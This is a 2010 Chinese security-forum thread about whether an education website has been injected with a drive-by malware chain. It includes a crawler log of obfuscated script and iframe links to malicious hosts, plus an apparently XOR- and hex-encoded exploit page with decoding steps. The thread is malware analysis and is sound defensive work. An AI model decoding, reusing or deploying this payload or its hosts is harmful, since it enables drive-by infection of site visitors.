12   1  /  2  页   跳转

[求助] http://www.gzdljy.com/huadu/

http://www.gzdljy.com/huadu/

挂马了吗??

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.0.3705)
分享到:
gototop
 

回复 1F 青松1 的帖子

Log is generated by FreShow.
[wide]http://www.gzdljy.com/huadu/
    [script]http://nj%65%38.cn
    [script]http://n%6Ae9.%63%6E
    [script]http://v.js%67%75a%6Eg%6Ai.%63%6E
        [frame]http://asd1233.3322.org:97/xo/dk.html
            [script]http://js.tongji.linezing.com/1566155/tongji.js
            [frame]http://asd1233.3322.org:97/xo/0.htm
                [frame]http://asd1233.3322.org:97/xo/../0.htm
                    [object]http://kjy6fj.3322.org:28/www.baidu.com
                [script]http://asd1233.3322.org:97/xo/\"http://js.tongji.linezing.com/1549551/tongji.js\"
                [script]http://asd1233.3322.org:97/xo/\"http://js.tongji.linezing.com/1549551/tongji.js\"
    [script]http://v%2E%74%61ogu.o%72%67.%63%6E
    [script]http://%76.%74g%32%35%30%2E%63om.%63n
    [script]http://www.gzdljy.com/huadu/inc/rest_img.js
    [script]http://www.gzdljy.com/huadu/today.js
    [script]http://nj%65%38.cn
    [script]http://n%6Ae9.%63%6E
    [script]http://v.js%67%75a%6Eg%6Ai.%63%6E
    [script]http://v%2E%74%61ogu.o%72%67.%63%6E
    [script]http://%76.%74g%32%35%30%2E%63om.%63n
    [script]http://www.gzdljy.com/huadu/ads/js.js
    [script]http://nj%65%38.cn
    [script]http://n%6Ae9.%63%6E
    [script]http://v.js%67%75a%6Eg%6Ai.%63%6E
    [script]http://v%2E%74%61ogu.o%72%67.%63%6E
    [script]http://%76.%74g%32%35%30%2E%63om.%63n
    [script]http://nj%65%38.cn
    [script]http://n%6Ae9.%63%6E
    [script]http://v.js%67%75a%6Eg%6Ai.%63%6E
    [script]http://v%2E%74%61ogu.o%72%67.%63%6E
    [script]http://%76.%74g%32%35%30%2E%63om.%63n
gototop
 

回复:http://www.gzdljy.com/huadu/

请版主讲讲http://asd1233.3322.org:97/xo/../0.htm
这个点解
我次次解到这不会解
最后编辑networkedition 最后编辑于 2010-04-13 12:52:40
gototop
 

回复:http://www.gzdljy.com/huadu/

等待。。。。。。。
gototop
 

回复:http://www.gzdljy.com/huadu/



647360327D737A7D2F355356502537672156262737672320243539455F535A455F39352A575735291F1864736032535C5A575B2F7D737A7D39353767762776703767712B712B37672A25717637672B202B2037677625762437672A70712637677625767037672A772B2137672A742A7737672B212A7437677174762037672A25767337672A272A74376771732B20376771737173376776742B213767762676713767712A762B376776772B2137677622762037677076707637677076707635291F18647360324B4165426740657A445C6853535E5B406A6A7E5B48645C5F545B66626254505157717E7044755D45534B597871795A5868635D437E666565745C635D514156437E6B7C2F677C7761717362773A5E5A535A395A5A535A394141535A397D737A39535C5A575B3B291F1865745F45507C61547067617E6160406A7C434B775C465D6A685E7F5C63767E685A46477F475F5C5D4363536466706358515360704856787F7754752F7C776532536060736B3A3B291F18647360325C5E5B5B5D73455745632F226A2A242222223F3A4B4165426740657A445C6853535E5B406A6A7E5B48645C5F545B66626254505157717E7044755D45534B597871795A5868635D437E666565745C635D514156437E6B7C3C7E777C75667A38203B291F186473603276615F79767162607060675B5B71557E6263417C65475865475F4B465941642F677C7761717362773A35376722712271376722712271353B291F18657A7B7E773A76615F79767162607060675B5B71557E6263417C65475865475F4B465941643C7E777C75667A2E5C5E5B5B5D73455745633D203B691F181B76615F79767162607060675B5B71557E6263417C65475865475F4B46594164392F76615F79767162607060675B5B71557E6263417C65475865475F4B46594164291F181B1F186F647360326A5C5C677F5A67427D7971637E63617D77715D7A715447535E7857484376645A657474505760465F7A7B65735C5A665063565E4B68607B2F76615F79767162607060675B5B71557E6263417C65475865475F4B465941643C6167706166607B7C753A223E5C5E5B5B5D73455745633D203B291F1876777E7766773276615F79767162607060675B5B71557E6263417C65475865475F4B46594164291F181F1832747D603A6643797C47704167625A42707D71544A2F2229326643797C47704167625A42707D71544A2E20252229326643797C47704167625A42707D71544A39393B32691F18323265745F45507C61547067617E6160406A7C434B775C465D6A685E7F5C63767E685A46477F475F5C5D4363536466706358515360704856787F775475496643797C47704167625A42707D71544A4F322F326A5C5C677F5A67427D7971637E63617D77715D7A715447535E7857484376645A657474505760465F7A7B65735C5A665063565E4B68607B3239326A5C5C677F5A67427D7971637E63617D77715D7A715447535E7857484376645A657474505760465F7A7B65735C5A665063565E4B68607B3239324B4165426740657A445C6853535E5B406A6A7E5B48645C5F545B66626254505157717E7044755D45534B597871795A5868635D437E666565745C635D514156437E6B7C291F18326F291F18445F586058242F305C735C30294A5463755963222F305C735C3029635376615B6651202F305C735C30295C7A5163202F305C735C3029795C736B612A2F305C735C3029797B59582A2F305C735C302976757F70557B5B232F305C735C30295643635456232F305C735C30295C457C442A2F305C735C30295C535F62242F305C735C3029797B6845202F305C735C302975777E7C212F305C735C302945617B7C627A65242F305C735C3029615F477D797147232F305C735C30296663635F55262F305C735C3029


以上代码用redoce 的解密中8>HexASCII清除一次再用解密中的A>Xor(异或)密钥寻找把关键字http://改成var即可

中午太忙了代码不全造成错误不好意思
本帖被评分 1 次
最后编辑networkedition 最后编辑于 2010-04-14 09:16:51
gototop
 

回复 5F 湖心小筑 的帖子

此方法ms没有解密出呀
gototop
 

回复 5F 湖心小筑 的帖子

是呀,无解出来,还是请networkedition 大版主解一次,谢谢了。
gototop
 

回复:http://www.gzdljy.com/huadu/

版主又禁言了。
gototop
 

回复 7F 青松1 的帖子

我是有个解密的工具
gototop
 

回复:http://www.gzdljy.com/huadu/

我也要,
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT